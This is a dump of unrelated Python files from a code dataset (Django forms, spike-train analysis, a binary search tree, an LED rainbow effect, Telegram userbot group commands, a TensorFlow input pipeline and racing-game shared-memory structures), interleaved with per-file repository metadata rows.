super().__init__(*args, **kwargs)
self.fields["phone"].widget.attrs["autocomplete"] = "off"
self.fields["phone"].widget.attrs["placeholder"] = "Your Work Number"
self.fields["phone"].help_text = "Work phone number for work contacts"
self.fields["timezone"].help_text = "Timezone in which you work"
self.helper = FormHelper()
self.helper.form_method = "post"
self.helper.form_class = "newitem"
self.helper.form_show_labels = False
self.helper.layout = Layout(
Row(
Column("name", css_class="form-group col-md-6 mb-0"),
Column("email", css_class="form-group col-md-6 mb-0"),
css_class="form-row mt-4",
),
Row(
Column("phone", css_class="form-group col-md-6 mb-0"),
Column("timezone", css_class="form-group col-md-6 mb-0"),
css_class="form-row",
),
ButtonHolder(
Submit("submit", "Submit", css_class="btn btn-primary col-md-4"),
HTML(
"""
<button onclick="window.location.href='{{ cancel_link }}'" class="btn btn-outline-secondary col-md-4" type="button">Cancel</button>
"""
),
),
)
class UserCreationForm(forms.UserCreationForm): # pragma: no cover
"""
Create an individual :model:`users.User`.
"""
error_message = forms.UserCreationForm.error_messages.update(
{"duplicate_username": _("This username has already been taken.")}
)
class Meta(forms.UserCreationForm.Meta):
model = User
def clean_username(self):
username = self.cleaned_data["username"]
try:
User.objects.get(username=username)
except User.DoesNotExist:
return username
raise ValidationError(self.error_messages["duplicate_username"])
# Create ModelForm based on the Group model
class GroupAdminForm(ModelForm):
class Meta:
model = Group
exclude = []
# Add the users field
users = ModelMultipleChoiceField(
queryset=User.objects.all(),
required=False,
# Use the pretty ``filter_horizontal`` widget
widget=FilteredSelectMultiple("users", False),
label=_(
"Users",
),
)
def __init__(self, *args, **kwargs):
# Do the normal form initialisation
super().__init__(*args, **kwargs)
# If it is an existing group (saved objects have a pk)
if self.instance.pk:
# Populate the users field with the current Group users
self.fields["users"].initial = self.instance.user_set.all()
def save_m2m(self): # pragma: no cover
# Add the users to the Group
self.instance.user_set.set(self.cleaned_data["users"])
def save(self, *args, **kwargs): # pragma: no cover
# Default save
instance = super().save()
# Save many-to-many data
self.save_m2m()
return instance
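A hedged sketch of how GroupAdminForm might be wired into an admin.py; this registration is an assumption, not shown in the module above:

from django.contrib import admin
from django.contrib.auth.models import Group

class GroupAdmin(admin.ModelAdmin):
    form = GroupAdminForm
    filter_horizontal = ["permissions"]

admin.site.unregister(Group)            # drop the stock Group admin
admin.site.register(Group, GroupAdmin)  # re-register with the users field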
| 33
| 151
| 0.60951
| 459
| 4,059
| 5.270153
| 0.357298
| 0.028938
| 0.029764
| 0.028111
| 0.120711
| 0.060356
| 0.060356
| 0.060356
| 0.060356
| 0.060356
| 0
| 0.004773
| 0.277408
| 4,059
| 122
| 152
| 33.270492
| 0.81998
| 0.136487
| 0
| 0.160494
| 0
| 0
| 0.132743
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061728
| false
| 0
| 0.111111
| 0
| 0.296296
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a405be96095986ee0bca6128c66be907263013
| 5,119
|
py
|
Python
|
nxsdk_modules_contrib/pelenet/pelenet/utils/spikes.py
|
biagiom/models
|
79489a3c429b3027dd420840bbccfee5e8c9a879
|
[
"BSD-3-Clause"
] | 54
|
2020-03-04T17:37:17.000Z
|
2022-02-22T13:16:10.000Z
|
nxsdk_modules_contrib/pelenet/pelenet/utils/spikes.py
|
biagiom/models
|
79489a3c429b3027dd420840bbccfee5e8c9a879
|
[
"BSD-3-Clause"
] | 9
|
2020-08-26T13:17:54.000Z
|
2021-11-09T09:02:00.000Z
|
nxsdk_modules_contrib/pelenet/pelenet/utils/spikes.py
|
biagiom/models
|
79489a3c429b3027dd420840bbccfee5e8c9a879
|
[
"BSD-3-Clause"
] | 26
|
2020-03-18T17:09:34.000Z
|
2021-11-22T16:23:14.000Z
|
import numpy as np
import scipy.linalg as la
from statsmodels.tsa.api import SimpleExpSmoothing, Holt

"""
@desc: From activity probe, calculate spike patterns
"""
def getSpikesFromActivity(self, activityProbes):
    # Get number of probes (equals number of used cores)
    numProbes = np.shape(activityProbes)[0]

    # Concatenate all probes
    activityTrain = []
    for i in range(numProbes):
        activityTrain.extend(activityProbes[i].data)

    # Transform to numpy array
    activityTrain = np.array(activityTrain)

    # Calculate spike train from activity
    #spikeTrain = activityTrain[:,1:] - activityTrain[:,:-1]
    activityTrain[:, 1:] -= activityTrain[:, :-1]
    spikeTrain = activityTrain

    return spikeTrain

"""
@desc: Calculate cross correlation between spike trains of two neurons
"""
def cor(self, t1, t2):
    # Calculate standard deviation of each spike train
    sd1 = np.sqrt(np.correlate(t1, t1)[0])
    sd2 = np.sqrt(np.correlate(t2, t2)[0])

    # Check if any standard deviation is zero
    if (sd1 != 0 and sd2 != 0):
        return np.correlate(t1, t2)[0] / np.multiply(sd1, sd2)
    else:
        return 0

"""
@desc: Filter spike train
@pars: spikes: has N rows (number of neurons) and T columns (number of time steps)
       filter: filter method as string, can be: 'single exponential', 'double exponential' or 'gaussian' (symmetric)
"""
def getFilteredSpikes(self, spikes, filter="single exponential"):
    if (filter == 'single exponential'):
        return self.getSingleExponentialFilteredSpikes(spikes)
    if (filter == 'double exponential'):
        return self.getHoltDoubleExponentialFilteredSpikes(spikes)
    if (filter == 'gaussian'):
        return self.getGaussianFilteredSpikes(spikes)

"""
@desc: Get symmetric gaussian filtered spikes
"""
def getGaussianFilteredSpikes(self, spikes):
    # Define some variables
    wd = self.p.smoothingWd    # width of smoothing: number of influenced time steps to the left and right
    var = self.p.smoothingVar  # variance of the Gaussian kernel

    # Define the kernel
    lin = np.linspace(-wd, wd, (wd*2)+1)
    kernel = np.exp(-(1/(2*var))*lin**2)

    # Prepare spike window
    spikeWindow = np.concatenate((spikes[-wd:, :], spikes, spikes[:wd, :]))

    # Prepare smoothed array
    nSteps, nNeurons = spikeWindow.shape
    smoothed = np.zeros((nSteps, nNeurons))

    # Add smoothing to every spike
    for n in range(nNeurons):
        for t in range(wd, nSteps - wd):
            # Only add something if there is a spike, otherwise just add zeros
            add = kernel if spikeWindow[t, n] == 1 else np.zeros(2*wd+1)
            # Add values to smoothed array
            smoothed[t-wd:t+wd+1, n] += add

    # Return smoothed activity
    return smoothed[wd:-wd, :]

"""
@desc: Get single exponential filtered spikes
"""
def getSingleExponentialFilteredSpikes(self, spikes, smoothing_level=0.1):
    # Get dimensions
    N, T = np.shape(spikes)
    filteredSpikes = []

    # Iterate over all neurons
    for i in range(N):
        # Fit values
        fit = SimpleExpSmoothing(spikes[i, :]).fit(smoothing_level=smoothing_level)
        # Append filtered values for current neuron
        filteredSpikes.append(fit.fittedvalues)

    # Transform to numpy array and return
    return np.array(filteredSpikes)

"""
@desc: Get holt double exponential filtered spikes
"""
def getHoltDoubleExponentialFilteredSpikes(self, spikes, smoothing_level=0.1, smoothing_slope=0.1):
    # Get dimensions
    N, T = np.shape(spikes)
    filteredSpikes = []

    # Iterate over all neurons
    for i in range(N):
        # Fit values; if smoothing_slope = 0, the result equals the single exponential solution
        fit = Holt(spikes[i, :]).fit(smoothing_level=smoothing_level, smoothing_slope=smoothing_slope)
        # Append filtered values for current neuron
        filteredSpikes.append(fit.fittedvalues)

    # Transform to numpy array and return
    return np.array(filteredSpikes)

"""
@desc: Calculate fano factors
"""
def fano(self, spikes):
    # Get shape
    shp = spikes.shape

    # Iterate over all trials
    ff = []
    for i in range(shp[0]):
        # Get mean and variance of all spike trains
        mn = np.mean(spikes[i], axis=1)
        var = np.var(spikes[i], axis=1)
        # Get indices of zero-values
        mask = (mn != 0)
        # Append mean fano factors from all neurons with spiking activity
        ff.append(np.mean(var[mask]/mn[mask]))

    # Return mean fano factors for every trial
    return ff

"""
@desc: Calculate coefficient of variation
"""
def cv(self, spikes):
    # Get shape
    shp = spikes.shape

    # Iterate over all trials
    cv = []
    for i in range(shp[0]):
        # Get mean and standard deviation of all spike trains
        mn = np.mean(spikes[i], axis=1)
        sd = np.std(spikes[i], axis=1)
        # Get indices of zero-values
        mask = (mn != 0)
        # Append mean coefficients of variation from all neurons with spiking activity
        cv.append(np.mean(sd[mask]/mn[mask]))

    # Return mean coefficient of variation for every trial
    return cv
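A hedged sanity check for fano; since the function never touches self, None can be passed in its place, and Poisson spike counts should give Fano factors near 1:

import numpy as np

rng = np.random.default_rng(0)
# Hypothetical data: 3 trials, 50 neurons, 1000 time steps of Poisson counts.
spikes = rng.poisson(lam=2.0, size=(3, 50, 1000))
print(fano(None, spikes))  # three values close to 1.0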
| 31.99375
| 116
| 0.66302
| 657
| 5,119
| 5.150685
| 0.252664
| 0.01448
| 0.008865
| 0.016253
| 0.345154
| 0.345154
| 0.31383
| 0.291371
| 0.291371
| 0.291371
| 0
| 0.012462
| 0.231881
| 5,119
| 159
| 117
| 32.194969
| 0.848169
| 0.268412
| 0
| 0.253521
| 0
| 0
| 0.02013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.112676
| false
| 0
| 0.042254
| 0
| 0.309859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a74044f5f2241591f7f602964eb017fc2ac290
| 6,429
|
py
|
Python
|
src/bst.py
|
tranduythanh/algorithm-in-python
|
b883ea0bc4dcd46b9a9f72f0ca3786aa3545f58a
|
[
"MIT"
] | null | null | null |
src/bst.py
|
tranduythanh/algorithm-in-python
|
b883ea0bc4dcd46b9a9f72f0ca3786aa3545f58a
|
[
"MIT"
] | null | null | null |
src/bst.py
|
tranduythanh/algorithm-in-python
|
b883ea0bc4dcd46b9a9f72f0ca3786aa3545f58a
|
[
"MIT"
] | null | null | null |
from visualize import pprint

class Node:
    def __init__(self, key):
        self.left = None
        self.right = None
        self.val = key

    def __repr__(self):
        ptr = id(self)
        ret = f'{ptr}:'
        if self.left:
            ret = f'{ret} {self.left.val}'
        else:
            ret = f'{ret} None'
        ret = f'{ret} {self.val}'
        if self.right:
            ret = f'{ret} {self.right.val}'
        else:
            ret = f'{ret} None'
        return ret

    def has_no_child(self):
        return (self.left is None) and (self.right is None)

    def has_only_left(self):
        return (self.left is not None) and (self.right is None)

    def has_only_right(self):
        return (self.left is None) and (self.right is not None)

class Tree:
    def __init__(self, root=None):
        self.root = root

    def insert_recursive(self, x):
        if self.root is None:
            self.root = Node(x)
            return
        self.__insert_recursive(self.root, x)

    def __insert_recursive(self, node, x):
        if node.val == x:
            return
        if node.val < x:
            if node.right is None:
                node.right = Node(x)
                return
            self.__insert_recursive(node.right, x)
            return
        # insert to left
        if node.left is None:
            node.left = Node(x)
        self.__insert_recursive(node.left, x)

    def insert_loop(self, x):
        # NOTE: unlike insert_recursive, this variant does not skip
        # duplicates; an existing value is inserted again to the right.
        if self.root is None:
            self.root = Node(x)
            return
        node = self.root
        while True:
            if node.val > x:
                if node.left:
                    node = node.left
                    continue
                node.left = Node(x)
                return
            if node.right:
                node = node.right
                continue
            node.right = Node(x)
            return

    def exist_recursive(self, x):
        return self.__exist_recursive(self.root, x)

    def __exist_recursive(self, node, x):
        if node.val == x:
            return True
        if node.val < x:
            if node.right:
                return self.__exist_recursive(node.right, x)
            return False
        if node.left:
            return self.__exist_recursive(node.left, x)
        return False

    def exist_loop(self, x):
        node = self.root
        while True:
            if not node:
                return False
            if node.val == x:
                return True
            if node.val < x:
                node = node.right
                continue
            node = node.left

    def sort_lnr_recursive(self):
        return self.__lnr_recursive(self.root)

    def __lnr_recursive(self, node, arr=None):
        # a fresh list per call avoids the shared-mutable-default bug
        if arr is None:
            arr = []
        if node.left:
            self.__lnr_recursive(node.left, arr)
        arr.append(node.val)
        if node.right:
            self.__lnr_recursive(node.right, arr)
        return arr

    def sort_lnr_loop(self):
        ret = []
        node = self.root
        stack = []
        while True:
            while node:
                stack.append(node)
                node = node.left
            if len(stack) > 0:
                node = stack.pop()
                ret.append(node.val)
                node = node.right
                continue
            break
        return ret

    def sort_nlr_recursive(self):
        return self.__nlr_recursive(self.root)

    def __nlr_recursive(self, node, arr=None):
        if arr is None:
            arr = []
        arr.append(node.val)
        if node.left:
            self.__nlr_recursive(node.left, arr)
        if node.right:
            self.__nlr_recursive(node.right, arr)
        return arr

    def sort_lrn_recursive(self):
        return self.__lrn_recursive(self.root)

    def __lrn_recursive(self, node, arr=None):
        if arr is None:
            arr = []
        if node.left:
            self.__lrn_recursive(node.left, arr)
        if node.right:
            self.__lrn_recursive(node.right, arr)
        arr.append(node.val)
        return arr

    def get_min(self):
        node = self.root
        while node.left is not None:
            node = node.left
        return node.val

    def get_min_of_node(self, node):
        while node.left is not None:
            node = node.left
        return node.val

    def get_max(self):
        node = self.root
        while node.right is not None:
            node = node.right
        return node.val

    def delete(self, x):
        self.root = self.__delete(self.root, x)

    def __delete(self, node, x):
        if node is None:
            return None
        if node.val < x:
            node.right = self.__delete(node.right, x)
            return node
        if node.val > x:
            node.left = self.__delete(node.left, x)
            return node
        if node.val == x:
            if node.has_no_child():
                return None
            # Handle case: node has a single child
            if node.has_only_left():
                return node.left
            if node.has_only_right():
                return node.right
            # handle case: node has 2 children
            #        ____C___
            #       /        \
            #      B          E   <---- delete this node
            #                / \
            #               D   K
            #                  / \
            #                 I   L
            #                  \
            #                   J
            # step 1: replace E by I
            # step 2: delete I
            min_value = self.get_min_of_node(node.right)
            node.val = min_value
            node.right = self.__delete(node.right, min_value)
            return node
        return node

    def traverse(self):
        return self.__traverse(self.root, [])

    def __traverse(self, node, arr=None):
        if arr is None:
            arr = []
        arr.append(node)
        if node.left:
            self.__traverse(node.left, arr)
        if node.right:
            self.__traverse(node.right, arr)
        return arr

    def cal_height(self):
        return self.__cal_height(self.root)

    def __cal_height(self, node):
        if node is None:
            return 0
        a = self.__cal_height(node.left)
        b = self.__cal_height(node.right)
        if a > b:
            return (a + 1)
        return (b + 1)

    def build_tree(self, arr=[]):
        for item in arr:
            self.insert_recursive(item)

    def debug(self):
        pprint(self.root)
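A hedged usage sketch of the Tree API above (assuming the visualize dependency is importable so the module loads):

# Hypothetical usage.
t = Tree()
t.build_tree([8, 3, 10, 1, 6, 14, 4, 7, 13])
print(t.sort_lnr_loop())  # [1, 3, 4, 6, 7, 8, 10, 13, 14]
print(t.exist_loop(6))    # True
t.delete(3)               # two-children case: 3 is replaced by its in-order successor 4
print(t.sort_lnr_loop())  # [1, 4, 6, 7, 8, 10, 13, 14]
print(t.cal_height())     # 4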
| 27.474359
| 63
| 0.492767
| 770
| 6,429
| 3.923377
| 0.11039
| 0.057597
| 0.029791
| 0.033102
| 0.461106
| 0.359484
| 0.265475
| 0.209202
| 0.139027
| 0.106587
| 0
| 0.00187
| 0.417639
| 6,429
| 233
| 64
| 27.592275
| 0.805021
| 0.053196
| 0
| 0.473404
| 0
| 0
| 0.013999
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159574
| false
| 0
| 0.005319
| 0.047872
| 0.404255
| 0.010638
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5af94b7bf661eb528749316c8d0360da97313c8
| 1,023
|
py
|
Python
|
pythonModules/plugin_showRainbowAllLEDs.py
|
mhoelzner/BinaryClock_RP
|
3dcd6c9369b827c4228c90c8c4da6dd9c21ab632
|
[
"MIT"
] | null | null | null |
pythonModules/plugin_showRainbowAllLEDs.py
|
mhoelzner/BinaryClock_RP
|
3dcd6c9369b827c4228c90c8c4da6dd9c21ab632
|
[
"MIT"
] | null | null | null |
pythonModules/plugin_showRainbowAllLEDs.py
|
mhoelzner/BinaryClock_RP
|
3dcd6c9369b827c4228c90c8c4da6dd9c21ab632
|
[
"MIT"
] | null | null | null |
from neopixel import Color
import time

class ShowRainbowAllLEDs():
    def __init__(self, strip, config):
        self.strip = strip
        self.configuration = config

    def wheel(self, pos):
        """Generate rainbow colors across 0-255 positions."""
        if pos < 85:
            return Color(pos * 3, 255 - pos * 3, 0)
        elif pos < 170:
            pos -= 85
            return Color(255 - pos * 3, 0, pos * 3)
        else:
            pos -= 170
            return Color(0, pos * 3, 255 - pos * 3)

    def showRainbowAllLEDs(self):
        """Draw rainbow that fades across all pixels at once."""
        while True:
            if self.configuration.plugin == 1:
                return
            for j in range(256):
                if self.configuration.plugin == 1:
                    return
                for i in range(self.strip.numPixels()):
                    self.strip.setPixelColor(i, self.wheel((i+j) & 255))
                self.strip.show()
                time.sleep(0.02)
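The wheel mapping can be checked without LED hardware; a minimal sketch with a plain tuple standing in for neopixel's packed Color (an assumption for illustration):

def wheel_rgb(pos):
    # Same arithmetic as ShowRainbowAllLEDs.wheel, returning an (r, g, b) tuple.
    if pos < 85:
        return (pos * 3, 255 - pos * 3, 0)
    elif pos < 170:
        pos -= 85
        return (255 - pos * 3, 0, pos * 3)
    pos -= 170
    return (0, pos * 3, 255 - pos * 3)

print(wheel_rgb(0))    # (0, 255, 0)
print(wheel_rgb(128))  # (126, 0, 129)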
| 26.230769
| 72
| 0.507331
| 119
| 1,023
| 4.327731
| 0.428571
| 0.046602
| 0.040777
| 0.062136
| 0.178641
| 0.135922
| 0.135922
| 0
| 0
| 0
| 0
| 0.06891
| 0.390029
| 1,023
| 38
| 73
| 26.921053
| 0.75641
| 0.095797
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.076923
| 0
| 0.423077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b23767bc452d1d161330f945974af76c7faa29
| 3,337
|
py
|
Python
|
tronx/modules/group.py
|
TronUb/Tron
|
55b5067a34cf2849913647533d7d035cab64568e
|
[
"MIT"
] | 4
|
2022-03-07T07:27:04.000Z
|
2022-03-29T05:59:57.000Z
|
tronx/modules/group.py
|
TronUb/Tron
|
55b5067a34cf2849913647533d7d035cab64568e
|
[
"MIT"
] | null | null | null |
tronx/modules/group.py
|
TronUb/Tron
|
55b5067a34cf2849913647533d7d035cab64568e
|
[
"MIT"
] | 3
|
2022-03-05T15:24:51.000Z
|
2022-03-14T08:48:05.000Z
|
import asyncio

from pyrogram.raw import functions
from pyrogram.types import Message

from tronx import app, gen

app.CMD_HELP.update(
    {"group": (
        "group",
        {
            "bgroup [group name]": "Creates a basic group.",
            "sgroup [group name]": "Creates a super group.",
            "unread": "Mark a chat as unread in your telegram folders.",
            "channel [channel name]": "Create a channel through this command."
        }
    )}
)

@app.on_message(gen(["bgroup", "bgp"], allow=["sudo"]))
async def basicgroup_handler(_, m: Message):
    grpname = None
    users = None

    if app.long() == 1:
        return await app.send_edit(f"Usage: `{app.PREFIX}bgroup mygroupname`", delme=4)
    # the more specific arity is tested first; with `> 1` first this branch was unreachable
    elif app.long() > 2:
        grpname = m.text.split(None, 1)[1]
        users = m.text.split(None, 2)[2].split()
    elif app.long() > 1:
        grpname = m.text.split(None, 1)[1]
        users = "@TheRealPhoenixBot"
    else:
        grpname = False
        users = "@TheRealPhoenixBot"  # required

    try:
        if grpname:
            await app.send_edit(f"Creating a new basic group: `{grpname}`")
            group = await app.create_group(title=f"{grpname}", users=users)
            await app.send_edit(f"**Created a new basic group:** [{grpname}]({(await app.get_chat(group.id)).invite_link})")
        else:
            await app.send_edit("No group name is provided.", text_type=["mono"], delme=4)
    except Exception as e:
        await app.error(e)

@app.on_message(gen(["sgroup", "sgp"], allow=["sudo"]))
async def supergroup_handler(_, m: Message):
    grpname = None
    about = None

    if app.long() == 1:
        return await app.send_edit(f"`Usage: {app.PREFIX}sgroup mygroupname`", delme=4)
    elif app.long() > 2:
        grpname = m.text.split(None, 1)[1]
        about = m.text.split(None, 2)[2]
    elif app.long() > 1:
        grpname = m.text.split(None, 1)[1]
        about = ""
    else:
        grpname = False
        about = ""

    try:
        if grpname:
            await app.send_edit(f"Creating a new super group: `{grpname}`")
            group = await app.create_supergroup(title=f"{grpname}", description=about)
            await app.send_edit(f"**Created a new super group:** [{grpname}]({(await app.get_chat(group.id)).invite_link})")
        else:
            await app.send_edit("No group name is provided.", text_type=["mono"], delme=4)
    except Exception as e:
        await app.error(e)

@app.on_message(gen(["unread", "un"], allow=["sudo"]))
async def unreadchat_handler(_, m: Message):
    try:
        await asyncio.gather(
            m.delete(),
            app.invoke(
                functions.messages.MarkDialogUnread(
                    peer=await app.resolve_peer(m.chat.id),
                    unread=True
                )
            ),
        )
    except Exception as e:
        await app.error(e)

@app.on_message(gen("channel", allow=["sudo"]))
async def channel_handler(_, m: Message):
    chname = None
    about = None

    if app.long() == 1:
        return await app.send_edit(f"Usage: `{app.PREFIX}channel [channel name]`", delme=4)
    elif app.long() > 2:
        chname = m.text.split(None, 1)[1]
        about = m.text.split(None, 2)[2]
    elif app.long() > 1:
        chname = m.text.split(None, 1)[1]
        about = ""

    try:
        if chname:
            await app.send_edit(f"Creating your channel: `{chname}`")
            response = await app.create_channel(title=f"{chname}", description=about)
            if response:
                await app.send_edit(f"**Created a new channel:** [{chname}]({(await app.get_chat(response.id)).invite_link})", disable_web_page_preview=True)
            else:
                await app.send_edit("Couldn't create a channel.")
    except Exception as e:
        await app.error(e)
| 26.275591
| 145
| 0.66407
| 503
| 3,337
| 4.326044
| 0.214712
| 0.084559
| 0.066176
| 0.088235
| 0.559283
| 0.518842
| 0.463235
| 0.463235
| 0.399816
| 0.399816
| 0
| 0.011527
| 0.168115
| 3,337
| 126
| 146
| 26.484127
| 0.772334
| 0.002397
| 0
| 0.49
| 0
| 0.02
| 0.269312
| 0.034265
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04
| 0
| 0.07
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b4a7c2bcf95fde6a181a23d3adc5de69780240
| 5,152
|
py
|
Python
|
benchmark/bit_task/input_pipeline.py
|
Fanxingye/AutoDL
|
6f409aefc8b81e5fe47df57b82332c8df427875d
|
[
"Apache-2.0"
] | 1
|
2021-11-04T09:19:14.000Z
|
2021-11-04T09:19:14.000Z
|
benchmark/bit_task/input_pipeline.py
|
Fanxingye/AutoDL
|
6f409aefc8b81e5fe47df57b82332c8df427875d
|
[
"Apache-2.0"
] | null | null | null |
benchmark/bit_task/input_pipeline.py
|
Fanxingye/AutoDL
|
6f409aefc8b81e5fe47df57b82332c8df427875d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import tensorflow_probability as tfp
import tensorflow_datasets as tfds
import bit_hyperrule
# A workaround to avoid crash because tfds may open too many files.
import resource
low, high = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (high, high))
# Adjust depending on the available RAM.
MAX_IN_MEMORY = 200_000
# vim /home/yiran.wu/.local/lib/python3.7/site-packages/tensorflow_datasets/core/dataset_info.py :
# added in line 449 : return
def get_data(dataset, train_split):
resize_size, crop_size = bit_hyperrule.get_resolution_from_dataset(dataset)
# build from folder
data_builder = tfds.folder_dataset.ImageFolder(dataset)
# get numbers
num_classes = data_builder.info.features['label'].num_classes
num_train = data_builder.info.splits['train'].num_examples
num_test = data_builder.info.splits['test'].num_examples
num_valid = data_builder.info.splits['val'].num_examples
# to dataset
    train_data = data_builder.as_dataset(split='train', decoders={'image': tfds.decode.SkipDecoding()})
    test_data = data_builder.as_dataset(split='test', decoders={'image': tfds.decode.SkipDecoding()})
    valid_data = data_builder.as_dataset(split='val', decoders={'image': tfds.decode.SkipDecoding()})
decoder = data_builder.info.features['image'].decode_example
    mixup_alpha = bit_hyperrule.get_mixup(num_train)
# get returns
train_data = data_aug(data=train_data,
mode='train',
num_examples=num_train,
decoder=decoder,
num_classes=num_classes,
resize_size=resize_size,
crop_size=crop_size,
mixup_alpha=mixup_alpha)
valid_data = data_aug(data=valid_data,
mode='valid',
num_examples=num_valid,
decoder=decoder,
num_classes=num_classes,
resize_size=resize_size,
crop_size=crop_size,
mixup_alpha=mixup_alpha)
test_data = data_aug(data=test_data,
mode='test',
num_examples=num_test,
decoder=decoder,
num_classes=num_classes,
resize_size=resize_size,
crop_size=crop_size,
mixup_alpha=mixup_alpha)
return train_data, valid_data, test_data, num_train, num_classes
# shadow function of get_data
def data_aug(data,
mode,
num_examples,
decoder,
num_classes,
resize_size,
crop_size,
mixup_alpha):
def _pp(data):
im = decoder(data['image'])
        if mode == 'train':
im = tf.image.resize(im, [resize_size, resize_size])
im = tf.image.random_crop(im, [crop_size, crop_size, 3])
            im = tf.image.random_flip_left_right(im)  # randomized horizontal flip for augmentation
else:
# usage of crop_size here is intentional
im = tf.image.resize(im, [crop_size, crop_size])
im = (im - 127.5) / 127.5
label = tf.one_hot(data['label'], num_classes)
return {'image': im, 'label': label}
def _mixup(data):
beta_dist = tfp.distributions.Beta(mixup_alpha, mixup_alpha)
beta = tf.cast(beta_dist.sample([]), tf.float32)
data['image'] = (beta * data['image'] +
(1 - beta) * tf.reverse(data['image'], axis=[0]))
data['label'] = (beta * data['label'] +
(1 - beta) * tf.reverse(data['label'], axis=[0]))
return data
def reshape_for_keras(features, crop_size):
features["image"] = tf.reshape(features["image"], (1, crop_size, crop_size, 3))
features["label"] = tf.reshape(features["label"], (1, -1))
return (features["image"], features["label"])
data = data.cache()
if mode == 'train':
data = data.repeat(None).shuffle(min(num_examples, MAX_IN_MEMORY))
data = data.map(_pp, tf.data.experimental.AUTOTUNE)
data = data.batch(1)
# if mixup_alpha is not None and mixup_alpha > 0.0 and mode == 'train':
# data = data.map(_mixup, tf.data.experimental.AUTOTUNE)
data = data.map(lambda x: reshape_for_keras(x, crop_size=crop_size))
return data
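# Example usage (a minimal sketch; assumes an ImageFolder-style layout with
# train/val/test splits under /path/to/dataset, and that `model` is a
# compiled Keras model; note that train_split is currently unused here):
#   train_ds, valid_ds, test_ds, num_train, num_classes = get_data(
#       "/path/to/dataset", train_split="train")
#   model.fit(train_ds, steps_per_epoch=num_train, validation_data=valid_ds)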
| 38.162963
| 103
| 0.606366
| 635
| 5,152
| 4.711811
| 0.297638
| 0.048128
| 0.048128
| 0.037433
| 0.225267
| 0.142045
| 0.090241
| 0.090241
| 0.090241
| 0.090241
| 0
| 0.011242
| 0.29212
| 5,152
| 134
| 104
| 38.447761
| 0.809158
| 0.209627
| 0
| 0.204819
| 0
| 0
| 0.03733
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060241
| false
| 0
| 0.060241
| 0
| 0.180723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b4c824ddba4f2d18052e43c4be91b69f16e79d
| 5,997
|
py
|
Python
|
accrpc/maps.py
|
manucabral/accrpc
|
8b8f3d47751732706570fded73cdc64bf1edb41d
|
[
"MIT"
] | 3
|
2022-01-18T01:11:21.000Z
|
2022-01-25T01:04:42.000Z
|
accrpc/maps.py
|
manucabral/accrpc
|
8b8f3d47751732706570fded73cdc64bf1edb41d
|
[
"MIT"
] | null | null | null |
accrpc/maps.py
|
manucabral/accrpc
|
8b8f3d47751732706570fded73cdc64bf1edb41d
|
[
"MIT"
] | null | null | null |
from ctypes import Structure, sizeof, c_int, c_float, c_wchar
# Credits
# https://github.com/dabde/acc_shared_mem_access_python
# https://github.com/rrennoir/PyAccSharedMemory
class Statics(Structure):
_fields_ = [
("smVersion", c_wchar * 15),
("acVersion", c_wchar * 15),
("numberOfSessions", c_int),
("numCars", c_int),
("carModel", c_wchar * 33),
("track", c_wchar * 33),
("playerName", c_wchar * 33),
("playerSurname", c_wchar * 33),
("playerNick", c_wchar * 33),
("sectorCount", c_int),
("maxTorque", c_float),
("maxPower", c_float),
("maxRpm", c_int),
("maxFuel", c_float),
("suspensionMaxTravel", c_float * 4),
("tyreRadius", c_float * 4),
("maxTurboBoost", c_float * 4),
("deprecated_1", c_float),
("deprecated_2", c_float),
("penaltiesEnabled", c_int),
("aidFuelRate", c_float),
("aidTireRate", c_float),
("aidMechanicalDamage", c_float),
("aidAllowTyreBlankets", c_int),
("aidStability", c_float),
